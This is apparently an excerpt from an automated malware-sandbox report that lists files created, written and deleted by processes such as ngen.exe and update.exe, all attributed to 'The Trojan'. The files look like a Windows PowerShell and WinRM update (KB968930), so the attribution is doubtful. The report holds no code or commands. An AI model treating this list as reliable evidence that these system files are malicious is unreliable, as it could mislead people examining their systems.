C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (0 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (0 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (0 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (0 bytes)
C:\ea4acb66495575d6b9f323 (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (0 bytes)
The process ngen.exe:3596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)
The process ngen.exe:3168 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (752 bytes)
The process ngen.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)
The process ngen.exe:3300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)
The process ngen.exe:856 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (782 bytes)
The process ngen.exe:2988 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1454 bytes)
The process ngen.exe:3172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1074 bytes)
The process ngen.exe:1960 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1396 bytes)
The process ngen.exe:1944 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (714 bytes)
The process ngen.exe:420 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1112 bytes)
The process ngen.exe:916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)
The process ngen.exe:3936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)
The process ngen.exe:3996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)
The process ngen.exe:1868 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)
The process ngen.exe:2188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)
The process ngen.exe:2952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1152 bytes)
The process ngen.exe:3560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)
The process ngen.exe:3224 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)
The process ngen.exe:1724 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)
The process ngen.exe:3220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)
The process ngen.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)
The process ngen.exe:2164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)
The process ngen.exe:648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (458 bytes)
The process update.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
%System%\SET12.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
%System%\SET1B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
%WinDir%\inf\SET1D.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
%System%\SET1A.tmp (789 bytes)
%WinDir%\Help\SETCA.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
%WinDir%\SECD5.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
%System%\winrm\0409\SET22.tmp (601 bytes)
%System%\SET36.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
%System%\SET25.tmp (2 bytes)
%System%\SET13.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
%System%\SET14.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
%WinDir%\inf\SET1E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
%System%\SET2A.tmp (1281 bytes)
%System%\SETC4.tmp (42 bytes)
%System%\SET19.tmp (25 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\SET2D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
%System%\SET33.tmp (25 bytes)
%WinDir%\msmqinst.log (5398 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
%System%\SETB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
%System%\SET2B.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
%System%\SET2E.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
%System%\SETE.tmp (673 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
%System%\wbem\SET23.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\SET17.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5705 bytes)
%System%\SET34.tmp (789 bytes)
%System%\SET18.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
%System%\SET27.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
%System%\SET11.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
%System%\SET35.tmp (14 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\SET10.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
%System%\SET26.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
%System%\config\system (3251 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
%System%\SET32.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\wbem\SET9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
%System%\SET16.tmp (12 bytes)
%System%\winrm\0409\SET3C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (49682 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
%System%\SET28.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
%System%\SET31.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
%System%\SET29.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
%System%\SET2C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
%WinDir%\KB968930.log (245066 bytes)
%System%\SET15.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\SET24.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
%System%\SET1C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
%System%\SETD.tmp (1281 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\SETC.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
%WinDir%\inf\SET37.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
%WinDir%\inf\SET38.tmp (12 bytes)
%System%\SET2F.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
%System%\SET30.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)
The Trojan deletes the following file(s):
%System%\GroupPolicy\Adm\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%WinDir%\inf\SET1D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\SET1A.tmp (0 bytes)
%WinDir%\Help\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (0 bytes)
%WinDir%\SECD5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\winrm\0409\SET22.tmp (0 bytes)
%System%\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\SETC4.tmp (0 bytes)
%System%\SET19.tmp (0 bytes)
%System%\SET1B.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\wbem\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\SET34.tmp (0 bytes)
%System%\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (0 bytes)
%WinDir%\Temp\UPD8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET35.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\SET32.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\wbem\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\winrm\0409\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
